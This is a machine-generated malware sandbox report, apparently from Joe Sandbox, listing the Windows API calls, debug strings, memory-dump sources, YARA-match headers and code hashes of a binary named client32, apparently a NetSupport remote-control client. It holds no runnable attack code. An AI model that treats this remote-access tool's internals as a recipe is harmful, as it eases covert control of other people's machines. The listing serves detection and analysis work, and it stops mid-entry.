                                                                                                                                                                                                    • String ID: Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s$Assert. File %hs, line %d, err %d, Expr %s$Client32$Info. assert, restarting...$V12.10F4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32 ref: 689DF9FE
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ADVAPI32.DLL), ref: 689DFA34
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DecodeLibraryLoadPointer
                                                                                                                                                                                                    • String ID: ADVAPI32.DLL$SystemFunction036
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1106D752
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1106D794
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1106D8ED
                                                                                                                                                                                                      • Part of subcall function 110B74B0: ExitProcess.KERNEL32 ref: 110B74F2
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1106D907
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1106D942
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterExitLeaveProcesswsprintf$ErrorLastMessage
                                                                                                                                                                                                    • String ID: !bSentLogin$%02x $..\ctl32\Connect.cpp$Connect, Send AudioFmt, mode=%d, smp/s=%d, bits=%d$connSend (s%d) %-4u bytes: %s$idata->tr
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • RecIsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11045544
                                                                                                                                                                                                    • IsMember(%ls, %ls) ret %d, took %u ms, xrefs: 110454E6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$FreeString
                                                                                                                                                                                                    • String ID: IsMember(%ls, %ls) ret %d, took %u ms$RecIsMember(%ls, %ls) ret %d, took %u ms
                                                                                                                                                                                                    • API String ID: 2011556836-2400621309
                                                                                                                                                                                                    • Opcode ID: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
                                                                                                                                                                                                    • Instruction ID: 400cf60c0998823ea0bb6020a3248241c8ed3d764918c69dd9f09d3b4840e21c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE816471E0021A9BDB20DF54CC90BAAB3B5EF88714F1045E8D909D7A84EB75AE81CF90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,BBC4A55B), ref: 11059069
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 110590CE
                                                                                                                                                                                                    • timeGetTime.WINMM ref: 110590FC
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11059136
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110591AA
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 110591C4
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110591E9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$CountObjectSingleTickTimeWaittime
                                                                                                                                                                                                    • String ID: _License$maxslaves
                                                                                                                                                                                                    • API String ID: 3724810986-253336860
                                                                                                                                                                                                    • Opcode ID: 1a5778744d7334ab928a4606c54cc66baf7cb7b46047f7e118299d17b48d35e6
                                                                                                                                                                                                    • Instruction ID: b9473765ee5a894416c22d4106f00ac8eee3be5f778696d0a0a90b9ce83e720c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a5778744d7334ab928a4606c54cc66baf7cb7b46047f7e118299d17b48d35e6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49518E71E006269BCB85CFA5C884A6EFBF9FB49704B10866DE925D7244F730E910CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetOverlappedResult.KERNEL32(?,BBC4A31B,FFFFFFFF,00000001), ref: 1100B7AC
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1100B7B6
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1100B819
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1100B856
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1100B90F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
                                                                                                                                                                                                    • String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
                                                                                                                                                                                                    • API String ID: 3598861413-432254317
                                                                                                                                                                                                    • Opcode ID: 88086ed7cad01db98769a6e7f02a836ab8858efd9f4792b07cbe4e8a26896150
                                                                                                                                                                                                    • Instruction ID: bce60c6a70f4087aecce3b408ab27d19c814a1bd4bae8f21e2f5314e0b08db4f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88086ed7cad01db98769a6e7f02a836ab8858efd9f4792b07cbe4e8a26896150
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E751D4B8D00A1AABE710DF65CC84ABBB7F8EF44748F10855DF96A92281E7347580C7A5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • PostMessageA.USER32(0000FFFF,0000C1FF,00000000,00000000), ref: 1104B225
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,0000048F,00000032,00000000), ref: 1104B256
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,00000483,00000000,00000000), ref: 1104B268
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,0000048F,000000C8,00000000), ref: 1104B27C
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,00000483,00000001,?), ref: 1104B293
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,00000800,00000000,00000000), ref: 1104B2A4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                                                                    • String ID: Client$UnloadMirrorOnEndView$tVPq
                                                                                                                                                                                                    • API String ID: 410705778-2026197083
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetParent.USER32(00008000), ref: 11077853
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,?), ref: 11077877
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110778B9
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,00000000), ref: 1107785C
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 110778E8
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$ExitProcess$DestroyErrorLastLoadLongMessageParentWindowwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$hMenu$hSub$idata->pButtonInfo
                                                                                                                                                                                                    • API String ID: 1870487012-2787262744
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110EBBE0: LocalAlloc.KERNEL32(00000040,00000014,?,1100D58F,?), ref: 110EBBF0
                                                                                                                                                                                                      • Part of subcall function 110EBBE0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D58F,?), ref: 110EBC02
                                                                                                                                                                                                      • Part of subcall function 110EBBE0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D58F,?), ref: 110EBC14
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D5A7
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D5C0
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1100D5DF
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1100D600
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D649
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000), ref: 1100D661
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1100D66A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleNamewsprintf
                                                                                                                                                                                                    • String ID: %sNSSilence.exe %u %u$D
                                                                                                                                                                                                    • API String ID: 3414582223-4146734959
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: SelectPalette.GDI32(?,?,00000000), ref: 1111B73C
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: SelectPalette.GDI32(?,?,00000000), ref: 1111B751
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B764
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B771
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B796
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    • GdiFlush.GDI32(?,?,?,023A8E08), ref: 1111D4D0
                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1111D50D
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111D51A
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,023A8E08), ref: 1111D524
                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 1111D54B
                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 1111D55E
                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 1111D56B
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(111E59C8), ref: 1111D578
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Error deleting membm, e=%d, xrefs: 1111D52B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Delete$Object$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                                                                                                                                    • String ID: Error deleting membm, e=%d
                                                                                                                                                                                                    • API String ID: 4021610862-709490903
                                                                                                                                                                                                    • Opcode ID: 9c2adf2ed169df4d317d6cc21ab7cd28a5f95e7760aa942516609c3df0eba2e1
                                                                                                                                                                                                    • Instruction ID: 8035f785c448485e0a0b583a16257735e59db1fe9725df5791180d2e2a6c23f4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c2adf2ed169df4d317d6cc21ab7cd28a5f95e7760aa942516609c3df0eba2e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D2147B5500B029BD2919F75D8D8AAFF7F4EF89308F10491DE6AA87204DB34B541CF62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • SetPropA.USER32(?,?,00000000), ref: 1113B33E
                                                                                                                                                                                                    • GetPropA.USER32(?), ref: 1113B34D
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1113B37F
                                                                                                                                                                                                    • RemovePropA.USER32(?), ref: 1113B3B1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Prop$wsprintf$Remove
                                                                                                                                                                                                    • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                                                                                                                    • API String ID: 2737406398-1590351400
                                                                                                                                                                                                    • Opcode ID: 01c1f07ef8b6b209979e896109e748aae703513a6db7c0a7f24b0c6da771398e
                                                                                                                                                                                                    • Instruction ID: 61aa09a3932057afedc91f8550a7d54e25a2d8e58743395c812a8a85ab32a301
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01c1f07ef8b6b209979e896109e748aae703513a6db7c0a7f24b0c6da771398e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA71E975E112299FD710CFA9DD80BAEF7B8FB88325F40456FE90AD7244D634A900CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11057136
                                                                                                                                                                                                      • Part of subcall function 11157010: LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11057293
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$CountTick$LibraryLoad
                                                                                                                                                                                                    • String ID: Client$DisableWirelessInfo$Info. NC_WIRELESS took %d ms$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h$gfff
                                                                                                                                                                                                    • API String ID: 2027352829-2337161965
                                                                                                                                                                                                    • Opcode ID: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
                                                                                                                                                                                                    • Instruction ID: 84ed5054cfcb45ae474b39cb997af099e397576dfe613bc4edcee20f92af9c19
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8916D75E0065E9FCB45CF94C884AEEF7B6BF58318F104158E819AB281DB30AE45CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BBC4A55B), ref: 110890D2
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110890F2
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110891CC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                                                                                                    • String ID: ..\ctl32\EVMNGR.cpp$bFound
                                                                                                                                                                                                    • API String ID: 2351996187-1425459369
                                                                                                                                                                                                    • Opcode ID: 6fdbd68c3c27f10dc3acf3685911079d36d957e2866ff6e55e5f076c332c9d36
                                                                                                                                                                                                    • Instruction ID: 93f90889458edbc4556596d890223acb70056fa3e67425ba47832c416fc48267
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fdbd68c3c27f10dc3acf3685911079d36d957e2866ff6e55e5f076c332c9d36
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D517A75E0C2459FDF06DF68C888F9ABBE5EB89314F14859DE816DB281E730E940CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110F2C0: GetClientRect.USER32(?,?), ref: 1110F2EA
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 11115761
                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 1111577A
                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 11115788
                                                                                                                                                                                                    • GetScrollRange.USER32(?,00000000,?,?), ref: 111157C9
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000003), ref: 111157D9
                                                                                                                                                                                                    • GetScrollRange.USER32(?,00000001,?,00000000), ref: 111157EC
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 111157F6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 1111583C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                                                                                                                                                                    • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                                                                                                                                                                    • API String ID: 4172599486-2052393828
                                                                                                                                                                                                    • Opcode ID: 3fb9398d884e0b1f03dd4fb152e9d316f2021fb16bc8a688f9a69a5ffb4c59fd
                                                                                                                                                                                                    • Instruction ID: 3e241e9a407663bc388a2dd64db1b086e46b56b899d91e46caf7545b16d0e57c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fb9398d884e0b1f03dd4fb152e9d316f2021fb16bc8a688f9a69a5ffb4c59fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851087590060AAFDB14CFA9C980BEEFBF9FF88314F148529E916A7244D734A941CF60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • #16.WSOCK32(?,?,?,00000000), ref: 689C78F6
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 689C7924
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 689C7937
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(?), ref: 689C7944
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DebugErrorLastOutputStringwsprintf
                                                                                                                                                                                                    • String ID: $(Httputil.c) Error %d reading HTTP response header$hbuf->data$httputil.c
                                                                                                                                                                                                    • API String ID: 605895956-769711038
                                                                                                                                                                                                    • Opcode ID: 661bb124a21c450e1744d0080218d045aee34d4bb4f5cc58d5e858806c6b90fe
                                                                                                                                                                                                    • Instruction ID: 81984667acd5c11688b5064316c9e2f4c198c6c48e4d7fbaeab11e1cfa7f5540
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 661bb124a21c450e1744d0080218d045aee34d4bb4f5cc58d5e858806c6b90fe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7541C779A00601AFD714DF68DD44E6BB7F8EF95319B40C82CE99A87641E731F805CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BBC4A55B), ref: 11089427
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?), ref: 11089540
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11089504
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CurrentEnterErrorExitLastLeaveMessageProcessThreadwsprintf
                                                                                                                                                                                                    • String ID: !((dwAttr & EV_CANPOST) && !(dwEvent & EV_CANPOST))$!(dwEvent & EV_INTERNAL_AUTOREF)$..\ctl32\EVMNGR.cpp$bOk$queue
                                                                                                                                                                                                    • API String ID: 15733517-3192407146
                                                                                                                                                                                                    • Opcode ID: 2aacc6b71f2621278017e212fdfb650457c49b9024b24aed8d4968e913391440
                                                                                                                                                                                                    • Instruction ID: 8c4930c3779224970a64a0d24a005b11ffa0fea26eb6bb835e6f19940be3f5f1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2aacc6b71f2621278017e212fdfb650457c49b9024b24aed8d4968e913391440
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0141A375D0472AABD711DF59D880F9EBBF4AB84B14F008529F825A7341E734A504CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110B5F0: timeGetTime.WINMM ref: 1110B5FD
                                                                                                                                                                                                      • Part of subcall function 110F6220: GetACP.KERNEL32(023AB828,DBCS,Charset,932=*128), ref: 110F62AE
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032,?), ref: 1103B642
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 1103B64A
                                                                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 1103B657
                                                                                                                                                                                                    • SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 1103B663
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 1103B66C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pixel$ReleaseSleepTimetime
                                                                                                                                                                                                    • String ID: DoFlushOptimal, maxcb=%d, cb=%d, gcb=%d$View$limitcolorbits
                                                                                                                                                                                                    • API String ID: 766270992-1413253680
                                                                                                                                                                                                    • Opcode ID: d5852c839270aa23ef5ae38c366fd629fbc8cd0939447888d43a8d295bfa1ddf
                                                                                                                                                                                                    • Instruction ID: f16d89a374e4fe568ab7d55a1f425cdb876f14b981240f7c8f6700600d478685
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5852c839270aa23ef5ae38c366fd629fbc8cd0939447888d43a8d295bfa1ddf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31419535E0161E9FEF15CFA4CD95BFEB7A5EB84309F10416DE916A7280EB34A90087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 1102732F
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 11027336
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 11027358
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 11027378
                                                                                                                                                                                                    • LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027399
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110273D6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
